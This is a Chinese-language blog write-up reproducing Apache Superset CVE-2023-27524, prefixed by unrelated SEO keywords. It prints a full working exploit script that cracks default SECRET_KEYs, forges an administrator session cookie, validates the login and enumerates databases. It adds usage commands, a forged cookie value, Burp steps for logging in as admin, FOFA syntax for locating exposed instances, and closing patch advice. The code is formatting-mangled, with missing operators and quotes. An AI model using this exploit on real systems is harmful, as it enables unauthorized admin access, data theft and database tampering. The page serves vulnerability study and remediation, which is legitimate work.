汤原建设局网站,网站优化建设安徽,优化快速排名教程,校园网站开发的需求分析文章目录 Apache Superset 未授权访问漏洞(CVE-2023-27524)复现0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.漏洞复现 0x06 修复建议 Apache Superset 未授权访问漏洞(CVE-2023-27524)复现
0x01 前言
免责声明#xff1a;请勿利用文… 文章目录 Apache Superset 未授权访问漏洞(CVE-2023-27524)复现0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.漏洞复现 0x06 修复建议 Apache Superset 未授权访问漏洞(CVE-2023-27524)复现
0x01 前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用
0x02 漏洞描述
Apache Superset是一个开源的数据可视化和数据探测平台它基于Python构建使用了一些类似于Django和Flask的Python web框架。提供了一个用户友好的界面可以轻松地创建和共享仪表板、查询和可视化数据也可以集成到其他应用程序中。
由于Apache Superset存在不安全的默认配置未根据安装说明更改默认SECRET_KEY的系统受此漏洞影响未经身份认证的远程攻击者利用此漏洞可以访问未经授权的资源或执行恶意代码。
0x03 影响版本
Apache Superset 2.0.10x04 漏洞环境
FOFA语法 “Apache Superset”
0x05 漏洞复现
1.访问漏洞环境 2.漏洞复现
首先Apache Superset是基于python中的flask web框架编写的flask是一个python轻量级web框架它的session存储在客户端的cookie字段中。为了防止session篡改flask进行了如下的处理代码存放在flask模块中sessions.py文件中
The default session interface that stores sessions in signed cookies
through the :mod:itsdangerous module.
#: the salt that should be applied on top of the secret key for the
#: signing of cookie based sessions.
salt cookie-session
#: the hash function to use for the signature. The default is sha1
digest_method staticmethod(hashlib.sha1)
#: the name of the itsdangerous supported key derivation. The default
#: is hmac.
key_derivation hmac
#: A python serializer for the payload. The default is a compact
#: JSON derived serializer with support for some extra Python types
#: such as datetime objects or tuples.
serializer session_json_serializer
session_class SecureCookieSessiondef get_signing_serializer(self, app):
if not app.secret_key:
return None
signer_kwargs dict(
key_derivationself.key_derivation, digest_methodself.digest_method
)
return URLSafeTimedSerializer(
app.secret_key,
saltself.salt,
serializerself.serializer,
signer_kwargssigner_kwargs,
)
……
……使用漏洞利用工具 下载地址
https://github.com/horizon3ai/CVE-2023-27524
from flask_unsign import session
import requests
import urllib3
import argparse
import re
from time import sleep
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)SECRET_KEYS [b\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h, # version 1.4.1bCHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET, # version 1.4.1bthisISaSECRET_1234, # deployment templatebYOUR_OWN_RANDOM_GENERATED_SECRET_KEY, # documentationbTEST_NON_DEV_SECRET # docker compose
]def main():parser argparse.ArgumentParser()parser.add_argument(--url, -u, helpBase URL of Superset instance, requiredTrue)parser.add_argument(--id, helpUser ID to forge session cookie for, default1, requiredFalse, default1)parser.add_argument(--validate, -v, helpValidate login, requiredFalse, actionstore_true)parser.add_argument(--timeout, -t, helpTime to wait before using forged session cookie, default5s, requiredFalse, typeint, default5)args parser.parse_args()try:u args.url.rstrip(/) /login/headers {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0}resp requests.get(u, headersheaders, verifyFalse, timeout30, allow_redirectsFalse)if resp.status_code ! 200:print(fError retrieving login page at {u}, status code: {resp.status_code})returnsession_cookie Nonefor c in resp.cookies:if c.name session:session_cookie c.valuebreakif not session_cookie:print(Error: No session cookie found)returnprint(fGot session cookie: {session_cookie})try:decoded session.decode(session_cookie)print(fDecoded session cookie: {decoded})except:print(Error: Not a Flask session cookie)returnmatch re.search(r#34;version_string#34;: #34;(.*?)#34, resp.text)if match:version match.group(1)else:version Unknownprint(fSuperset Version: {version})for i, k in enumerate(SECRET_KEYS):cracked session.verify(session_cookie, k)if cracked:breakif not cracked:print(Failed to crack session cookie)returnprint(fVulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k})try:user_id int(args.id)except:user_id args.idforged_cookie session.sign({_user_id: user_id, user_id: user_id}, k)print(fForged session cookie for user {user_id}: {forged_cookie})if args.validate:validated Falsetry:headers[Cookie] fsession{forged_cookie}print(fSleeping {args.timeout} seconds before using forged cookie to account for time drift...)sleep(args.timeout)resp requests.get(u, headersheaders, verifyFalse, timeout30, allow_redirectsFalse)if resp.status_code 302:print(fGot 302 on login, forged cookie appears to have been accepted)validated Trueelse:print(fGot status code {resp.status_code} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.)except Exception as e_inner:print(fGot error {e_inner} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.)if not validated:returnprint(Enumerating databases)for i in range(1, 101):database_url_base args.url.rstrip(/) /api/v1/databasetry:r requests.get(f{database_url_base}/{i}, headersheaders, verifyFalse, timeout30, allow_redirectsFalse)if r.status_code 200:result r.json()[result] # validate response is JSONname result[database_name]print(fFound database {name})elif r.status_code 404:print(fDone enumerating databases)break # no more databaseselse:print(fUnexpected error: status code{r.status_code})breakexcept Exception as e_inner:print(fUnexpected error: {e_inner})breakexcept Exception as e:print(fUnexpected error: {e})if __name__ __main__:main()PS用法
python37 CVE-2023-27524.py -h
usage: CVE-2023-27524.py [-h] --url URL [--id ID] [--validate][--timeout TIMEOUT]optional arguments:-h, --help show this help message and exit--url URL, -u URL Base URL of Superset instance--id ID User ID to forge session cookie for, default1--validate, -v Validate login--timeout TIMEOUT, -t TIMEOUTTime to wait before using forged session cookie,default5s然后执行如下命令-u 后面跟你想要检测的地址。
python3 CVE-2023-27524.py -u http://127.0.0.1/ --validate
攻击者可以利用爆破出来的key伪造一个user_id值设置为1的会话cookie以管理员身份登录。在浏览器的本地存储中设置伪造的会话 cookie 并刷新页面允许攻击者以管理员身份访问应用程序。SQL Lab接口允许攻击者对连接的数据库运行任意SQL语句。根据数据库用户权限攻击者可以查询、修改和删除数据库中的任何数据以及在数据库服务器上执行远程代码。若存在漏洞这里会爆出一个cookie值。
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZV6v8g.KpbTtE1tzjCztMlt5PHsHYdOsU8 使用burp拦截请求包这里是GET也就是说不需要登录直接刷新获取即可。 替换上面的cookie值替换为漏洞利用工具爆出来的cookie值。替换后放开数据包成功登录进去Apache Superset 管理后台 里面可以执行一些sql语句等操作(证明其有危害即可不要随意执行sql语句篡改数据) 0x06 修复建议
1.临时解决措施 修改配置中的SECRET_KEY值使用新的 SECRET_KEY 重新加密该信息参考链接
https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation2.目前厂商已发布升级补丁以修复漏洞补丁获取链接
https://lists.apache.org/thread/n0ftx60sllf527j7g11kmt24wvof8xyk参考链接 https://mp.weixin.qq.com/s/VVpurbMCYZ2gqaG-SV1Oug https://www.cve.org/CVERecord?idCVE-2023-27524
